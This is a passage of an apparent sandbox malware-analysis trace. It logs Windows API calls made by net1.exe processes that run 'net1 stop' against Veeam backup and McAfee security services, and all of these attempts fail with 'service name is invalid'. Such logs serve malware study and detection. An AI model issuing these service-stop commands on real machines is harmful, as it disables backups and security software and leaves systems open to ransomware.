_String2="stop") returned -13 [0120.017] _wcsicmp (_String1="files", _String2="stop") returned -13 [0120.017] _wcsicmp (_String1="group", _String2="stop") returned -12 [0120.017] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0120.017] _wcsicmp (_String1="help", _String2="stop") returned -11 [0120.017] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0120.017] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0120.017] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0120.017] _wcsicmp (_String1="session", _String2="stop") returned -15 [0120.017] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0120.017] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0120.017] _wcsicmp (_String1="share", _String2="stop") returned -12 [0120.017] _wcsicmp (_String1="start", _String2="stop") returned -14 [0120.017] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0120.017] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0120.017] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0120.017] _wcsicmp (_String1="accounts", _String2="VeeamMountSvc") returned -21 [0120.017] _wcsicmp (_String1="computer", _String2="VeeamMountSvc") returned -19 [0120.017] _wcsicmp (_String1="config", _String2="VeeamMountSvc") returned -19 [0120.017] _wcsicmp (_String1="continue", _String2="VeeamMountSvc") returned -19 [0120.017] _wcsicmp (_String1="cont", _String2="VeeamMountSvc") returned -19 [0120.017] _wcsicmp (_String1="file", _String2="VeeamMountSvc") returned -16 [0120.017] _wcsicmp (_String1="files", _String2="VeeamMountSvc") returned -16 [0120.017] _wcsicmp (_String1="group", _String2="VeeamMountSvc") returned -15 [0120.017] _wcsicmp (_String1="groups", _String2="VeeamMountSvc") returned -15 [0120.017] _wcsicmp (_String1="help", _String2="VeeamMountSvc") returned -14 [0120.017] _wcsicmp (_String1="helpmsg", _String2="VeeamMountSvc") returned -14 [0120.017] _wcsicmp (_String1="localgroup", _String2="VeeamMountSvc") returned -10 [0120.017] _wcsicmp (_String1="pause", _String2="VeeamMountSvc") returned -6 [0120.017] _wcsicmp (_String1="session", _String2="VeeamMountSvc") returned -3 [0120.017] _wcsicmp (_String1="sessions", _String2="VeeamMountSvc") returned -3 [0120.017] _wcsicmp (_String1="sess", _String2="VeeamMountSvc") returned -3 [0120.017] _wcsicmp (_String1="share", _String2="VeeamMountSvc") returned -3 [0120.017] _wcsicmp (_String1="start", _String2="VeeamMountSvc") returned -3 [0120.017] _wcsicmp (_String1="stats", _String2="VeeamMountSvc") returned -3 [0120.018] _wcsicmp (_String1="statistics", _String2="VeeamMountSvc") returned -3 [0120.018] _wcsicmp (_String1="stop", _String2="VeeamMountSvc") returned -3 [0120.018] _wcsicmp (_String1="time", _String2="VeeamMountSvc") returned -2 [0120.018] _wcsicmp (_String1="user", _String2="VeeamMountSvc") returned -1 [0120.018] _wcsicmp (_String1="users", _String2="VeeamMountSvc") returned -1 [0120.018] _wcsicmp (_String1="msg", _String2="VeeamMountSvc") returned -9 [0120.018] _wcsicmp (_String1="messenger", _String2="VeeamMountSvc") returned -9 [0120.018] _wcsicmp (_String1="receiver", _String2="VeeamMountSvc") returned -4 [0120.018] _wcsicmp (_String1="rcv", _String2="VeeamMountSvc") returned -4 [0120.018] _wcsicmp (_String1="netpopup", _String2="VeeamMountSvc") returned -8 [0120.018] _wcsicmp (_String1="redirector", _String2="VeeamMountSvc") returned -4 [0120.018] _wcsicmp (_String1="redir", _String2="VeeamMountSvc") returned -4 [0120.018] _wcsicmp (_String1="rdr", _String2="VeeamMountSvc") returned -4 [0120.018] _wcsicmp (_String1="workstation", _String2="VeeamMountSvc") returned 1 [0120.018] _wcsicmp (_String1="work", _String2="VeeamMountSvc") returned 1 [0120.018] _wcsicmp (_String1="wksta", _String2="VeeamMountSvc") returned 1 [0120.018] _wcsicmp (_String1="prdr", _String2="VeeamMountSvc") returned -6 [0120.018] _wcsicmp (_String1="devrdr", _String2="VeeamMountSvc") returned -18 [0120.018] _wcsicmp (_String1="lanmanworkstation", _String2="VeeamMountSvc") returned -10 [0120.018] _wcsicmp (_String1="server", _String2="VeeamMountSvc") returned -3 [0120.018] _wcsicmp (_String1="svr", _String2="VeeamMountSvc") returned -3 [0120.018] _wcsicmp (_String1="srv", _String2="VeeamMountSvc") returned -3 [0120.018] _wcsicmp (_String1="lanmanserver", _String2="VeeamMountSvc") returned -10 [0120.018] _wcsicmp (_String1="alerter", _String2="VeeamMountSvc") returned -21 [0120.018] _wcsicmp (_String1="netlogon", _String2="VeeamMountSvc") returned -8 [0120.018] _wcsupr (in: _String="VeeamMountSvc" | out: _String="VEEAMMOUNTSVC") returned="VEEAMMOUNTSVC" [0120.018] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2854b0 [0120.023] GetServiceKeyNameW (in: hSCManager=0x2854b0, lpDisplayName="VEEAMMOUNTSVC", lpServiceName=0x39aaf0, lpcchBuffer=0x1cfac8 | out: lpServiceName="", lpcchBuffer=0x1cfac8) returned 0 [0120.024] _wcsicmp (_String1="msg", _String2="VEEAMMOUNTSVC") returned -9 [0120.024] _wcsicmp (_String1="messenger", _String2="VEEAMMOUNTSVC") returned -9 [0120.024] _wcsicmp (_String1="receiver", _String2="VEEAMMOUNTSVC") returned -4 [0120.024] _wcsicmp (_String1="rcv", _String2="VEEAMMOUNTSVC") returned -4 [0120.024] _wcsicmp (_String1="redirector", _String2="VEEAMMOUNTSVC") returned -4 [0120.024] _wcsicmp (_String1="redir", _String2="VEEAMMOUNTSVC") returned -4 [0120.024] _wcsicmp (_String1="rdr", _String2="VEEAMMOUNTSVC") returned -4 [0120.024] _wcsicmp (_String1="workstation", _String2="VEEAMMOUNTSVC") returned 1 [0120.024] _wcsicmp (_String1="work", _String2="VEEAMMOUNTSVC") returned 1 [0120.024] _wcsicmp (_String1="wksta", _String2="VEEAMMOUNTSVC") returned 1 [0120.024] _wcsicmp (_String1="prdr", _String2="VEEAMMOUNTSVC") returned -6 [0120.024] _wcsicmp (_String1="devrdr", _String2="VEEAMMOUNTSVC") returned -18 [0120.025] _wcsicmp (_String1="lanmanworkstation", _String2="VEEAMMOUNTSVC") returned -10 [0120.025] _wcsicmp (_String1="server", _String2="VEEAMMOUNTSVC") returned -3 [0120.025] _wcsicmp (_String1="svr", _String2="VEEAMMOUNTSVC") returned -3 [0120.025] _wcsicmp (_String1="srv", _String2="VEEAMMOUNTSVC") returned -3 [0120.025] _wcsicmp (_String1="lanmanserver", _String2="VEEAMMOUNTSVC") returned -10 [0120.025] _wcsicmp (_String1="alerter", _String2="VEEAMMOUNTSVC") returned -21 [0120.025] _wcsicmp (_String1="netlogon", _String2="VEEAMMOUNTSVC") returned -8 [0120.025] NetServiceControl (in: servername=0x0, service="VEEAMMOUNTSVC", opcode=0x0, arg=0x0, bufptr=0x1cfac4 | out: bufptr=0x1cfac4) returned 0x889 [0120.026] wcscpy_s (in: _Destination=0x39a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0120.026] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74860000 [0120.027] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74860000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0120.029] GetFileType (hFile=0x0) returned 0x0 [0120.029] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x283ed0 [0120.029] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x283ed0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0120.029] WriteFile (in: hFile=0x0, lpBuffer=0x283ed0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x1cfa04, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1cfa04, lpOverlapped=0x0) returned 0 [0120.029] LocalFree (hMem=0x283ed0) returned 0x0 [0120.029] GetFileType (hFile=0x0) returned 0x0 [0120.029] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x286178 [0120.029] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x286178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n(", lpUsedDefaultChar=0x0) returned 2 [0120.029] WriteFile (in: hFile=0x0, lpBuffer=0x286178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1cfa04, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1cfa04, lpOverlapped=0x0) returned 0 [0120.029] LocalFree (hMem=0x286178) returned 0x0 [0120.029] _ultow (in: _Dest=0x889, _Radix=1899060 | out: _Dest=0x889) returned="2185" [0120.029] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74860000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0120.029] GetFileType (hFile=0x0) returned 0x0 [0120.029] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x286178 [0120.030] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x286178, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0120.030] WriteFile (in: hFile=0x0, lpBuffer=0x286178, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x1cfa10, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1cfa10, lpOverlapped=0x0) returned 0 [0120.030] LocalFree (hMem=0x286178) returned 0x0 [0120.030] GetFileType (hFile=0x0) returned 0x0 [0120.030] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x286178 [0120.030] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x286178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n(", lpUsedDefaultChar=0x0) returned 2 [0120.030] WriteFile (in: hFile=0x0, lpBuffer=0x286178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1cfa10, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1cfa10, lpOverlapped=0x0) returned 0 [0120.030] LocalFree (hMem=0x286178) returned 0x0 [0120.030] NetApiBufferFree (Buffer=0x281ae8) returned 0x0 [0120.030] NetApiBufferFree (Buffer=0x281b00) returned 0x0 [0120.030] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamMountSvc /y" [0120.031] exit (_Code=2) Process: id = "236" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x602ed000" os_pid = "0xd10" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "141" os_parent_pid = "0xee0" cmd_line = "C:\\Windows\\system32\\net1 stop McAfeeFramework /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 630 os_tid = 0xeb0 [0120.577] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2bfa6c | out: lpSystemTimeAsFileTime=0x2bfa6c*(dwLowDateTime=0x1b9be910, dwHighDateTime=0x1d6f0d1)) [0120.577] GetCurrentProcessId () returned 0xd10 [0120.577] GetCurrentThreadId () returned 0xeb0 [0120.577] GetTickCount () returned 0x11516ad [0120.577] QueryPerformanceCounter (in: lpPerformanceCount=0x2bfa64 | out: lpPerformanceCount=0x2bfa64*=23967794360) returned 1 [0120.577] GetModuleHandleA (lpModuleName=0x0) returned 0x380000 [0120.577] __set_app_type (_Type=0x1) [0120.577] __p__fmode () returned 0x770331f4 [0120.578] __p__commode () returned 0x770331fc [0120.578] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x38ffe6) returned 0x0 [0120.578] __getmainargs (in: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068, _DoWildCard=0, _StartInfo=0x399024 | out: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068) returned 0 [0120.578] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0120.578] GetConsoleOutputCP () returned 0x1b5 [0120.579] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x399080 | out: lpCPInfo=0x399080) returned 1 [0120.579] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.951] sprintf_s (in: _DstBuf=0x2bfa24, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0120.951] setlocale (category=0, locale=".437") returned="English_United States.437" [0120.953] GetStdHandle (nStdHandle=0xfffffff5) returned 0x448 [0120.953] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0120.953] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop McAfeeFramework /y" [0120.953] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2bf7f0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0120.953] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x72) returned 0x67f650 [0120.953] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0120.953] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2bf9f4 | out: Buffer=0x2bf9f4*=0x681af0) returned 0x0 [0120.953] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2bf9f4 | out: Buffer=0x2bf9f4*=0x681b08) returned 0x0 [0120.954] _fileno (_File=0x77032900) returned -2 [0120.954] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0120.954] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0120.954] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0120.954] _wcsicmp (_String1="config", _String2="stop") returned -16 [0120.954] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0120.954] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0120.954] _wcsicmp (_String1="file", _String2="stop") returned -13 [0120.954] _wcsicmp (_String1="files", _String2="stop") returned -13 [0120.954] _wcsicmp (_String1="group", _String2="stop") returned -12 [0120.954] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0120.954] _wcsicmp (_String1="help", _String2="stop") returned -11 [0120.954] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0120.954] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0120.954] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0120.954] _wcsicmp (_String1="session", _String2="stop") returned -15 [0120.954] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0120.954] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0120.954] _wcsicmp (_String1="share", _String2="stop") returned -12 [0120.954] _wcsicmp (_String1="start", _String2="stop") returned -14 [0120.954] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0120.954] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0120.954] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0120.954] _wcsicmp (_String1="accounts", _String2="McAfeeFramework") returned -12 [0120.954] _wcsicmp (_String1="computer", _String2="McAfeeFramework") returned -10 [0120.954] _wcsicmp (_String1="config", _String2="McAfeeFramework") returned -10 [0120.954] _wcsicmp (_String1="continue", _String2="McAfeeFramework") returned -10 [0120.954] _wcsicmp (_String1="cont", _String2="McAfeeFramework") returned -10 [0120.954] _wcsicmp (_String1="file", _String2="McAfeeFramework") returned -7 [0120.955] _wcsicmp (_String1="files", _String2="McAfeeFramework") returned -7 [0120.955] _wcsicmp (_String1="group", _String2="McAfeeFramework") returned -6 [0120.955] _wcsicmp (_String1="groups", _String2="McAfeeFramework") returned -6 [0120.955] _wcsicmp (_String1="help", _String2="McAfeeFramework") returned -5 [0120.955] _wcsicmp (_String1="helpmsg", _String2="McAfeeFramework") returned -5 [0120.955] _wcsicmp (_String1="localgroup", _String2="McAfeeFramework") returned -1 [0120.955] _wcsicmp (_String1="pause", _String2="McAfeeFramework") returned 3 [0120.955] _wcsicmp (_String1="session", _String2="McAfeeFramework") returned 6 [0120.955] _wcsicmp (_String1="sessions", _String2="McAfeeFramework") returned 6 [0120.955] _wcsicmp (_String1="sess", _String2="McAfeeFramework") returned 6 [0120.955] _wcsicmp (_String1="share", _String2="McAfeeFramework") returned 6 [0120.955] _wcsicmp (_String1="start", _String2="McAfeeFramework") returned 6 [0120.955] _wcsicmp (_String1="stats", _String2="McAfeeFramework") returned 6 [0120.955] _wcsicmp (_String1="statistics", _String2="McAfeeFramework") returned 6 [0120.955] _wcsicmp (_String1="stop", _String2="McAfeeFramework") returned 6 [0120.955] _wcsicmp (_String1="time", _String2="McAfeeFramework") returned 7 [0120.955] _wcsicmp (_String1="user", _String2="McAfeeFramework") returned 8 [0120.955] _wcsicmp (_String1="users", _String2="McAfeeFramework") returned 8 [0120.955] _wcsicmp (_String1="msg", _String2="McAfeeFramework") returned 16 [0120.955] _wcsicmp (_String1="messenger", _String2="McAfeeFramework") returned 2 [0120.955] _wcsicmp (_String1="receiver", _String2="McAfeeFramework") returned 5 [0120.955] _wcsicmp (_String1="rcv", _String2="McAfeeFramework") returned 5 [0120.955] _wcsicmp (_String1="netpopup", _String2="McAfeeFramework") returned 1 [0120.955] _wcsicmp (_String1="redirector", _String2="McAfeeFramework") returned 5 [0120.955] _wcsicmp (_String1="redir", _String2="McAfeeFramework") returned 5 [0120.955] _wcsicmp (_String1="rdr", _String2="McAfeeFramework") returned 5 [0120.955] _wcsicmp (_String1="workstation", _String2="McAfeeFramework") returned 10 [0120.955] _wcsicmp (_String1="work", _String2="McAfeeFramework") returned 10 [0120.955] _wcsicmp (_String1="wksta", _String2="McAfeeFramework") returned 10 [0120.955] _wcsicmp (_String1="prdr", _String2="McAfeeFramework") returned 3 [0120.955] _wcsicmp (_String1="devrdr", _String2="McAfeeFramework") returned -9 [0120.955] _wcsicmp (_String1="lanmanworkstation", _String2="McAfeeFramework") returned -1 [0120.956] _wcsicmp (_String1="server", _String2="McAfeeFramework") returned 6 [0120.956] _wcsicmp (_String1="svr", _String2="McAfeeFramework") returned 6 [0120.956] _wcsicmp (_String1="srv", _String2="McAfeeFramework") returned 6 [0120.956] _wcsicmp (_String1="lanmanserver", _String2="McAfeeFramework") returned -1 [0120.956] _wcsicmp (_String1="alerter", _String2="McAfeeFramework") returned -12 [0120.956] _wcsicmp (_String1="netlogon", _String2="McAfeeFramework") returned 1 [0120.956] _wcsupr (in: _String="McAfeeFramework" | out: _String="MCAFEEFRAMEWORK") returned="MCAFEEFRAMEWORK" [0120.956] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x685448 [0120.959] GetServiceKeyNameW (in: hSCManager=0x685448, lpDisplayName="MCAFEEFRAMEWORK", lpServiceName=0x39aaf0, lpcchBuffer=0x2bf990 | out: lpServiceName="", lpcchBuffer=0x2bf990) returned 0 [0120.960] _wcsicmp (_String1="msg", _String2="MCAFEEFRAMEWORK") returned 16 [0120.960] _wcsicmp (_String1="messenger", _String2="MCAFEEFRAMEWORK") returned 2 [0120.960] _wcsicmp (_String1="receiver", _String2="MCAFEEFRAMEWORK") returned 5 [0120.960] _wcsicmp (_String1="rcv", _String2="MCAFEEFRAMEWORK") returned 5 [0120.960] _wcsicmp (_String1="redirector", _String2="MCAFEEFRAMEWORK") returned 5 [0120.960] _wcsicmp (_String1="redir", _String2="MCAFEEFRAMEWORK") returned 5 [0120.960] _wcsicmp (_String1="rdr", _String2="MCAFEEFRAMEWORK") returned 5 [0120.960] _wcsicmp (_String1="workstation", _String2="MCAFEEFRAMEWORK") returned 10 [0120.960] _wcsicmp (_String1="work", _String2="MCAFEEFRAMEWORK") returned 10 [0120.960] _wcsicmp (_String1="wksta", _String2="MCAFEEFRAMEWORK") returned 10 [0120.960] _wcsicmp (_String1="prdr", _String2="MCAFEEFRAMEWORK") returned 3 [0120.960] _wcsicmp (_String1="devrdr", _String2="MCAFEEFRAMEWORK") returned -9 [0120.960] _wcsicmp (_String1="lanmanworkstation", _String2="MCAFEEFRAMEWORK") returned -1 [0120.961] _wcsicmp (_String1="server", _String2="MCAFEEFRAMEWORK") returned 6 [0120.961] _wcsicmp (_String1="svr", _String2="MCAFEEFRAMEWORK") returned 6 [0120.961] _wcsicmp (_String1="srv", _String2="MCAFEEFRAMEWORK") returned 6 [0120.961] _wcsicmp (_String1="lanmanserver", _String2="MCAFEEFRAMEWORK") returned -1 [0120.961] _wcsicmp (_String1="alerter", _String2="MCAFEEFRAMEWORK") returned -12 [0120.961] _wcsicmp (_String1="netlogon", _String2="MCAFEEFRAMEWORK") returned 1 [0120.961] NetServiceControl (in: servername=0x0, service="MCAFEEFRAMEWORK", opcode=0x0, arg=0x0, bufptr=0x2bf98c | out: bufptr=0x2bf98c) returned 0x889 [0120.962] wcscpy_s (in: _Destination=0x39a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0120.962] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74860000 [0120.963] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74860000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0120.964] GetFileType (hFile=0x0) returned 0x0 [0120.964] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x683e60 [0120.964] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x683e60, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0120.964] WriteFile (in: hFile=0x0, lpBuffer=0x683e60, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x2bf8cc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2bf8cc, lpOverlapped=0x0) returned 0 [0120.964] LocalFree (hMem=0x683e60) returned 0x0 [0120.964] GetFileType (hFile=0x0) returned 0x0 [0120.964] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x686110 [0120.964] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x686110, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nh", lpUsedDefaultChar=0x0) returned 2 [0120.964] WriteFile (in: hFile=0x0, lpBuffer=0x686110, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2bf8cc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2bf8cc, lpOverlapped=0x0) returned 0 [0120.964] LocalFree (hMem=0x686110) returned 0x0 [0120.964] _ultow (in: _Dest=0x889, _Radix=2881788 | out: _Dest=0x889) returned="2185" [0120.965] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74860000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0120.965] GetFileType (hFile=0x0) returned 0x0 [0120.965] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x686110 [0120.965] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x686110, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0120.965] WriteFile (in: hFile=0x0, lpBuffer=0x686110, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x2bf8d8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2bf8d8, lpOverlapped=0x0) returned 0 [0120.965] LocalFree (hMem=0x686110) returned 0x0 [0120.965] GetFileType (hFile=0x0) returned 0x0 [0120.965] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x686110 [0120.965] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x686110, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nh", lpUsedDefaultChar=0x0) returned 2 [0120.965] WriteFile (in: hFile=0x0, lpBuffer=0x686110, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2bf8d8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2bf8d8, lpOverlapped=0x0) returned 0 [0120.965] LocalFree (hMem=0x686110) returned 0x0 [0120.965] NetApiBufferFree (Buffer=0x681af0) returned 0x0 [0120.966] NetApiBufferFree (Buffer=0x681b08) returned 0x0 [0120.966] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop McAfeeFramework /y" [0120.966] exit (_Code=2) Process: id = "237" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x604cd000" os_pid = "0x1190" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "104" os_parent_pid = "0xba0" cmd_line = "C:\\Windows\\system32\\net1 stop FA_Scheduler /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 631 os_tid = 0xc58 [0119.839] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10f82c | out: lpSystemTimeAsFileTime=0x10f82c*(dwLowDateTime=0x1b2c0870, dwHighDateTime=0x1d6f0d1)) [0119.839] GetCurrentProcessId () returned 0x1190 [0119.839] GetCurrentThreadId () returned 0xc58 [0119.839] GetTickCount () returned 0x11513cf [0119.839] QueryPerformanceCounter (in: lpPerformanceCount=0x10f824 | out: lpPerformanceCount=0x10f824*=23893993724) returned 1 [0119.839] GetModuleHandleA (lpModuleName=0x0) returned 0x380000 [0119.839] __set_app_type (_Type=0x1) [0119.839] __p__fmode () returned 0x770331f4 [0119.840] __p__commode () returned 0x770331fc [0119.840] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x38ffe6) returned 0x0 [0119.840] __getmainargs (in: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068, _DoWildCard=0, _StartInfo=0x399024 | out: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068) returned 0 [0119.840] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0119.840] GetConsoleOutputCP () returned 0x1b5 [0120.032] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x399080 | out: lpCPInfo=0x399080) returned 1 [0120.032] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.036] sprintf_s (in: _DstBuf=0x10f7e4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0120.036] setlocale (category=0, locale=".437") returned="English_United States.437" [0120.038] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3f8 [0120.038] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0120.038] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop FA_Scheduler /y" [0120.038] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x10f5b0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0120.038] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x6c) returned 0x223ae0 [0120.039] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0120.039] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x10f7b4 | out: Buffer=0x10f7b4*=0x221ae8) returned 0x0 [0120.039] NetApiBufferAllocate (in: ByteCount=0x10, 